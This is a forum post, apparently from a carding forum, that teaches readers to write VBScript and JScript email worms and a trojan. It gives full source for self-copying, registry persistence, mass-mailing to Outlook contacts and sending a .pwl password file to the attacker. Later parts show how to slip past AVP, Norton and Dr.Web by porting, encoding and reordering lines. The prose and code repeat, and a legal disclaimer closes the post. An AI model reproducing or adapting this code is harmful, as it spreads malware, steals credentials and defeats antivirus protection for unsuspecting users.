CarderPlanet
Professional
- Messages
- 2,549
- Reaction score
- 722
- Points
- 113
To write the examples, we will use Visual Basic Scripting Edition, which is used by the vast majority of Internet worms. Let's start with the Option Explicit and On Error Resume Next statements, the first is necessary when debugging the code, it prohibits the use of a variable that was not previously declared, and the second suppresses the error handler.
This example uses the FileSysObject and File variables, and if you make a mistake while writing the script by writing FileSysObiect, the interpreter will tell you that an undeclared variable in the Dim statement is being used. It is very difficult to find such errors, since they often change the entire logic of the program. Let's move on to the On Error Resume Next instruction, this instruction means that any error that occurs will be processed by the program code later, and in our case never. This allows you to disable the issuance of system error messages and mask the operation of the script.
Now let's describe the third and fourth lines of the example:
Set the FileSysObject variable to a reference to the WSH File System Object COM component object. Using the GetFile method, assign the File variable a link to the command line of the location of the executable file.
Let's copy the script to c: \ windows for further use.
Let's assign the WshShell variable a reference to the WSH COM component object that allows you to change system settings and launch applications.
Now we can safely control the captured computer.
First, let's write our "terrible virus" into the registry to restart it after a reboot, although this is not necessary for an E-mail worm, as well as the copying procedure.
The next step is beyond your imagination, you can copy a more complex virus from the Internet, as I-Worm. LoveLetter did, and run it, send you a file with passwords, or simply and boringly mess up a bunch of files.
And finally, we get to the "heart" of every Internet worm, the distribution procedure.
Let's create a link to the object of the most common Outlook mail client.
Dim OutlookObject, OutMail, Index
Let's set a cycle during which we will send infected messages to the first 50 addresses entered in the address book.
Let's create a new mail message
In the "To" field, enter the address from the address book
In the "Subject" field, insert the subject of the message
Add message text
Attach the script
And send it
Next.
So you became a virus writer. Feeling uplifted? Get down to the ground, this is just a frame, fill it, your task. Good luck!
Email worm framework:
Trojan horse skeleton:
Part 2. - Exploring New Opportunities
In the course of writing the first article, I ran into problems while testing the scripts I wrote, the AVP Script Checker installed on any attempt to save a file with commands to copy a file from a local machine, send via email, attempts to read the registry, gave a message about the presence of new modifications of various viruses. The impression was that the AVP is reliably guarding our interests, and I decided to check if this is really so?
While studying the documentation for Windows Scripting Host (WSH), I noticed a paragraph where it was said that Microsoft created a script independent of the language - a host that allowed building analogs of .bat files in VBScript, JScript and other scripting languages, for example, Active Perl or Python. On their site, nothing was said about Active Perl or Python, but about JScript was written in some detail, comparing the capabilities of VBScript and JScript, it became clear that they are identical and differ only in the syntax of the language.
It was a matter of technique to rewrite a script from one programming language to another, the result was:
Email worm framework
Trojan horse skeleton
AVP was silent
However, when executing the script, the Script Checker issued a message that this file might contain a virus and blocked its execution. After some more digging, I found out that it responds to an attempt to send a file by mail, as in VBScript and JScript the OutMail.Attachments.Add (WScript.ScriptFullName) line looks the same. We managed to get rid of this by coding the script with the MS Windows Script Encoder program.
The script was tested on the three most common anti-virus programs Norton AntiVirus, AVP and Dr.Web. The first two successfully remained silent, and only Dr.Web filtered it out as potentially dangerous, and the famous heuristic analyzer was triggered.
Based on the analysis made, we can assume that the next round of epidemics associated with writing viruses in JScript awaits us.
Part 3. - How to trick AVP Script Checker
The described method of bypassing the AVP Script checker is rather complicated, since it requires knowledge of different programming languages, but you can think of many simpler methods.
Almost all anti-virus programs work on the same principle; they compare files with virus patches in the database, so-called signatures. The AVP Script checker works according to a similar algorithm, which, after preliminary compilation, scans the file and searches for "familiar places". However, unlike compilers of powerful software products, cscript.exe performs only preliminary compilation, without editing the source code, and therefore, by slightly changing the source code of a previously written virus, you can easily bypass the protection.
Let's take a VBScript mail worm framework as a basis.
Let's start with the simplest method, changing the execution order, adding spaces and blank lines.
Replace
to OutMail.to = "E-mail address", for security, and save.
AVP "says": A new modification of the I-Worm VBS.Fool virus has been detected.
We remove the line Set File = FileSysObject.GetFile (WScript.ScriptFullName), he fell silent, which means that the antivirus responds precisely to the presence of this line. We swap the lines and get:
AVP Script checker is not responsive.
One can simply change the problem line like this:
The effect is the same, you just need to experiment. In the I-Worm VBS.HappyTime code, 35 blank lines have been added to the beginning of the file, which was enough to prevent the antivirus from recognizing it.
There are also more sophisticated methods, such as encoding the body of a virus. A prime example of this was the I-Worm VBS.Homepage in which the main code was coded as follows:
As a result, a rather simple script infected millions of computers around the world.
The next step is to write polymorphic in VBS, a script that can modify its code as needed.
To the displeasure of "real virus writers" who consider scripting technologies to be fun for lamers, the number of viruses using this technology is steadily growing. This is due to the ease of implementation and integration into the operating system, with the help of scripts you can completely control the system, start and stop processes, remotely create and delete users, edit files, and much more ...
Links
Windows Script Encoder is here:
P.S. Creation, use and distribution of malicious programs for computers is punishable by law.
Code:
Option Explicit
Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile (WScript.ScriptFullName)This example uses the FileSysObject and File variables, and if you make a mistake while writing the script by writing FileSysObiect, the interpreter will tell you that an undeclared variable in the Dim statement is being used. It is very difficult to find such errors, since they often change the entire logic of the program. Let's move on to the On Error Resume Next instruction, this instruction means that any error that occurs will be processed by the program code later, and in our case never. This allows you to disable the issuance of system error messages and mask the operation of the script.
Now let's describe the third and fourth lines of the example:
Code:
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")Set the FileSysObject variable to a reference to the WSH File System Object COM component object. Using the GetFile method, assign the File variable a link to the command line of the location of the executable file.
Let's copy the script to c: \ windows for further use.
Code:
File.Copy ("c: \ windows \ I_am_virus.vbs")Let's assign the WshShell variable a reference to the WSH COM component object that allows you to change system settings and launch applications.
Code:
Dim WshShell
Set WshShell = WScript.CreateObject ("WScript.Shell")Now we can safely control the captured computer.
First, let's write our "terrible virus" into the registry to restart it after a reboot, although this is not necessary for an E-mail worm, as well as the copying procedure.
Code:
WshShell.RegWrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows _
\ CurrentVersion \ RunServices \ virus "," c: \ windows \ I_am_virus.vbs "The next step is beyond your imagination, you can copy a more complex virus from the Internet, as I-Worm. LoveLetter did, and run it, send you a file with passwords, or simply and boringly mess up a bunch of files.
And finally, we get to the "heart" of every Internet worm, the distribution procedure.
Let's create a link to the object of the most common Outlook mail client.
Dim OutlookObject, OutMail, Index
Code:
Set OutlookObject = CreateObject ("Outlook.Application")Let's set a cycle during which we will send infected messages to the first 50 addresses entered in the address book.
Code:
For Index = 1 To 50Let's create a new mail message
Code:
Set OutMail = OutlookObject.CreateItem (0)In the "To" field, enter the address from the address book
Code:
OutMail.to = OutlookObject.GetNameSpace ("MAPI"). AddressLists (1) .AddressEntries (Index)In the "Subject" field, insert the subject of the message
Code:
OutMail.Subject = "Message Subject"Add message text
Code:
OutMail.Body = "Message Body"Attach the script
Code:
OutMail.Attachments.Add (WScript.ScriptFullName)And send it
Code:
OutMail.SendNext.
So you became a virus writer. Feeling uplifted? Get down to the ground, this is just a frame, fill it, your task. Good luck!
Email worm framework:
Code:
On Error Resume Next
Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)
Dim OutlookObject, OutMail, Index
Set OutlookObject = CreateObject("Outlook.Application")
For Index = 1 To 50
Set OutMail = OutlookObject.CreateItem(0)
OutMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
OutMail.Subject = "Тема сообщения"
OutMail.Body = "Тело сообщения"
OutMail.Attachments.Add(WScript.ScriptFullName)
OutMail.Send
NextTrojan horse skeleton:
Code:
On Error Resume Next
Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)
File.Copy ("c:\windows\I_am_virus.vbs")
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ _
CurrentVersion\RunServices\virus", "c:\windows\I_am_virus.vbs"
Dim OutlookObject, OutMail, Index
Set OutlookObject = CreateObject("Outlook.Application")
For Index = 1 To 50
Set OutMail = OutlookObject.CreateItem(0)
OutMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
OutMail.Subject = "Тема сообщения"
OutMail.Body = "Тело сообщения"
OutMail.Attachments.Add(WScript.ScriptFullName)
OutMail.Send
Next
Set OutMail = OutlookObject.CreateItem(0)
OutMail.to = "Ваш E-mail"
OutMail.Subject = "Тема сообщения"
OutMail.Body = "Тело сообщения"
OutMail.Attachments.Add("Путь к .pwl файлу")
OutMail.SendPart 2. - Exploring New Opportunities
In the course of writing the first article, I ran into problems while testing the scripts I wrote, the AVP Script Checker installed on any attempt to save a file with commands to copy a file from a local machine, send via email, attempts to read the registry, gave a message about the presence of new modifications of various viruses. The impression was that the AVP is reliably guarding our interests, and I decided to check if this is really so?
While studying the documentation for Windows Scripting Host (WSH), I noticed a paragraph where it was said that Microsoft created a script independent of the language - a host that allowed building analogs of .bat files in VBScript, JScript and other scripting languages, for example, Active Perl or Python. On their site, nothing was said about Active Perl or Python, but about JScript was written in some detail, comparing the capabilities of VBScript and JScript, it became clear that they are identical and differ only in the syntax of the language.
It was a matter of technique to rewrite a script from one programming language to another, the result was:
Email worm framework
Code:
var fileSysObject, file;
fileSysObject = new ActiveXObject("Scripting.FileSystemObject");
file = fileSysObject.GetFile(WScript.ScriptFullName);
var outlookObject, outMail, index;
outlookObject = new ActiveXObject("Outlook.Application");
for (index = 1; index < 50; index++){
outMail = outlookObject.CreateItem(0);
outMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(index);
outMail.Subject = "Тема сообщения";
outMail.Body = "Тело сообщения";
OutMail.Attachments.Add(WScript.ScriptFullName);
outMail.Send;}Trojan horse skeleton
Code:
var fileSysObject, file;
fileSysObject = new ActiveXObject("Scripting.FileSystemObject");
file = fileSysObject.GetFile(WScript.ScriptFullName);
file.Copy("c:\windows\I_am_virus.vbs");
var wshShell;
wshShell = new ActiveXObject("WScript.Shell");
wshShell.RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ _
CurrentVersion\RunServices\virus", "c:\windows\I_am_virus.vbs");
var outlookObject, outMail, index;
outlookObject = new ActiveXObject("Outlook.Application");
for (index = 1; index < 50; index++){
outMail = outlookObject.CreateItem(0);
outMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(index);
outMail.Subject = "Тема сообщения";
outMail.Body = "Тело сообщения";
OutMail.Attachments.Add(WScript.ScriptFullName);
outMail.Send;}
outMail = outlookObject.CreateItem(0);
outMail.to = "Ваш E-mail";
outMail.Subject = "Тема сообщения";
outMail.Body = "Тело сообщения";
outMail.Attachments.Add("Путь к .pwl файлу");
outMail.Send;AVP was silent
However, when executing the script, the Script Checker issued a message that this file might contain a virus and blocked its execution. After some more digging, I found out that it responds to an attempt to send a file by mail, as in VBScript and JScript the OutMail.Attachments.Add (WScript.ScriptFullName) line looks the same. We managed to get rid of this by coding the script with the MS Windows Script Encoder program.
The script was tested on the three most common anti-virus programs Norton AntiVirus, AVP and Dr.Web. The first two successfully remained silent, and only Dr.Web filtered it out as potentially dangerous, and the famous heuristic analyzer was triggered.
Based on the analysis made, we can assume that the next round of epidemics associated with writing viruses in JScript awaits us.
Part 3. - How to trick AVP Script Checker
The described method of bypassing the AVP Script checker is rather complicated, since it requires knowledge of different programming languages, but you can think of many simpler methods.
Almost all anti-virus programs work on the same principle; they compare files with virus patches in the database, so-called signatures. The AVP Script checker works according to a similar algorithm, which, after preliminary compilation, scans the file and searches for "familiar places". However, unlike compilers of powerful software products, cscript.exe performs only preliminary compilation, without editing the source code, and therefore, by slightly changing the source code of a previously written virus, you can easily bypass the protection.
Let's take a VBScript mail worm framework as a basis.
Let's start with the simplest method, changing the execution order, adding spaces and blank lines.
Replace
Code:
OutMail.to = OutlookObject.GetNameSpace ("MAPI"). AddressLists (1) .AddressEntries (Index)to OutMail.to = "E-mail address", for security, and save.
AVP "says": A new modification of the I-Worm VBS.Fool virus has been detected.
We remove the line Set File = FileSysObject.GetFile (WScript.ScriptFullName), he fell silent, which means that the antivirus responds precisely to the presence of this line. We swap the lines and get:
Code:
Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Dim OutlookObject, OutMail, Index
Set OutlookObject = CreateObject("Outlook.Application")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)AVP Script checker is not responsive.
One can simply change the problem line like this:
Code:
Set File = FileSysObject. _
GetFile(WScript. _
ScriptFullName)The effect is the same, you just need to experiment. In the I-Worm VBS.HappyTime code, 35 blank lines have been added to the beginning of the file, which was enough to prevent the antivirus from recognizing it.
There are also more sophisticated methods, such as encoding the body of a virus. A prime example of this was the I-Worm VBS.Homepage in which the main code was coded as follows:
Code:
DeCode ("Homepage encoded body")
Function DeCode (Coded)
For I = 1 To Len (Coded)
CurChar = Mid (Coded, I, 1)
If Asc (CurChar) = 15 Then
CurChar = Chr (10)
ElseIf Asc (CurChar) = 16 Then
CurChar = Chr (13)
ElseIf Asc (CurChar) = 17 Then
CurChar = Chr (32)
ElseIf Asc (CurChar) = 18 Then
CurChar = Chr (9)
Else
CurChar = Chr (Asc (CurChar) - 2)
End If
DeCode = DeCode & CurChar
Next
End FunctionAs a result, a rather simple script infected millions of computers around the world.
The next step is to write polymorphic in VBS, a script that can modify its code as needed.
To the displeasure of "real virus writers" who consider scripting technologies to be fun for lamers, the number of viruses using this technology is steadily growing. This is due to the ease of implementation and integration into the operating system, with the help of scripts you can completely control the system, start and stop processes, remotely create and delete users, edit files, and much more ...
Links
Windows Script Encoder is here:
P.S. Creation, use and distribution of malicious programs for computers is punishable by law.
